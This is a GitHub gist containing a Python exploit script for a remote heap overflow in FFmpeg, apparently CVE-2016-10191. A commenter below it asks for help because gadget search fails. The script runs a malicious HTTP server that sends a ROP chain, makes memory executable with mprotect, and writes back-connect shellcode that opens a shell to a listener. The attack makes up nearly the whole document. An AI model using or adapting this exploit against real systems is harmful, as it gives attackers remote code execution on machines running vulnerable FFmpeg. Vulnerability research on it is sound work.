Last active
May 4, 2023 18:46
-
-
Save PaulCher/324690b88db8c4cf844e056289d4a1d6 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import re | |
| import os | |
| import sys | |
| import socket | |
| import threading | |
| from time import sleep | |
| from pwn import * | |
| bind_ip = '0.0.0.0' | |
| bind_port = 12345 | |
| headers = """HTTP/1.1 200 OK | |
| Server: HTTPd/0.9 | |
| Date: Sun, 10 Apr 2005 20:26:47 GMT | |
| Content-Type: text/html | |
| Transfer-Encoding: chunked | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| Set-Cookie: XXXXXXXXXXXXXXXX=AAAAAAAAAAAAAAAA; | |
| """ | |
| elf = ELF('ffmpeg/ffmpeg') | |
| shellcode_location = 0x00400000 | |
| page_size = 0x1000 | |
| rwx_mode = 7 | |
| gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64'))) | |
| pop_rdi = gadget('pop rdi; ret') | |
| pop_rsi = gadget('pop rsi; ret') | |
| pop_rax = gadget('pop rax; ret') | |
| pop_rcx = gadget('pop rcx; ret') | |
| pop_rdx = gadget('pop rdx; ret') | |
| pop_rbp = gadget('pop rbp; ret') | |
| push_rbx = gadget('push rbx; jmp rdi') | |
| pop_rsp = gadget('pop rsp; ret') | |
| add_rsp = gadget('add rsp, 0x58') | |
| mov_gadget = gadget('mov qword [rcx], rax ; ret') | |
| mprotect_func = elf.plt['mprotect'] | |
| read_func = elf.plt['read'] | |
| def handle_request(client_socket): | |
| request = client_socket.recv(2048) | |
| payload = '' | |
| payload += 'C' * (0x8040) | |
| payload += 'CCCCCCCC' * 4 | |
| payload += p64(0x0058dc48) # rop starts here | |
| payload += 'CCCCCCCC' * 4 | |
| payload += p64(0x00d89257) # rdi | |
| payload += p64(0x010ccd95) # call *%rax | |
| payload += 'BBBBBBBB' * 3 | |
| payload += 'AAAA' | |
| payload += p32(0) | |
| payload += 'AAAAAAAA' | |
| payload += p64(0x0058dc48) # second add_esp rop to jump to uncorrupted chunk | |
| payload += 'XXXXXXXX' * 11 | |
| # real rop payload starts here | |
| # | |
| # using mprotect to create executable area | |
| payload += p64(pop_rdi) | |
| payload += p64(shellcode_location) | |
| payload += p64(pop_rsi) | |
| payload += p64(page_size) | |
| payload += p64(pop_rdx) | |
| payload += p64(rwx_mode) | |
| payload += p64(mprotect_func) | |
| # backconnect shellcode x86_64: 127.0.0.1:31337 | |
| shellcode = "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x7a\x69\xc7\x44\x24\x04\x7f\x00\x00\x01\x48\x89\xe6\x6a\x10\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"; | |
| shellcode = '\x90' * (8 - (len(shellcode) % 8)) + shellcode | |
| shellslices = map(''.join, zip(*[iter(shellcode)]*8)) | |
| write_location = shellcode_location - 8 | |
| for shellslice in shellslices: | |
| payload += p64(pop_rax) | |
| payload += shellslice | |
| payload += p64(pop_rcx) | |
| payload += p64(write_location) | |
| payload += p64(mov_gadget) | |
| write_location += 8 | |
| payload += p64(pop_rbp) | |
| payload += p64(4) | |
| payload += p64(shellcode_location) | |
| # 0x009e5641: mov qword [rcx], rax ; ret ; (1 found) | |
| # 0x010ccd95: push rbx ; jmp rdi ; (1 found) | |
| # 0x00d89257: pop rsp ; ret ; (1 found) | |
| # 0x0058dc48: add rsp, 0x58 ; ret ; (1 found) | |
| client_socket.send(headers) | |
| client_socket.send('-1\n') | |
| sleep(5) | |
| client_socket.send(payload) | |
| client_socket.close() | |
| if __name__ == '__main__': | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
| s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
| s.bind((bind_ip, bind_port)) | |
| s.listen(5) | |
| filename = os.path.basename(__file__) | |
| st = os.stat(filename) | |
| while True: | |
| client_socket, addr = s.accept() | |
| handle_request(client_socket) | |
| if os.stat(filename) != st: | |
| print 'restarted' | |
| sys.exit(0) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
latest i want to recurrent this bug
but when i run this script i got this output,and i can not find any infomation from the internet. can anybody help me
[@inspiron]:[CVE_2016_10191]$ ./exploit_ffmpeg.py
[] '/media/*/750G-01/downloads/CVE_2016_10191/bin/ffmpeg'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
FORTIFY: Enabled
Traceback (most recent call last):
File "./exploit_ffmpeg.py", line 56, in
mov_gadget = gadget('mov qword [rcx], rax; ret')
File "./exploit_ffmpeg.py", line 44, in
gadget = lambda x: next(elf.search(asm(x, os='linux', arch='amd64')))
StopIteration
my system is:
Linux inspiron 4.10.0-35-generic #39~16.04.1-Ubuntu SMP Wed Sep 13 09:02:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux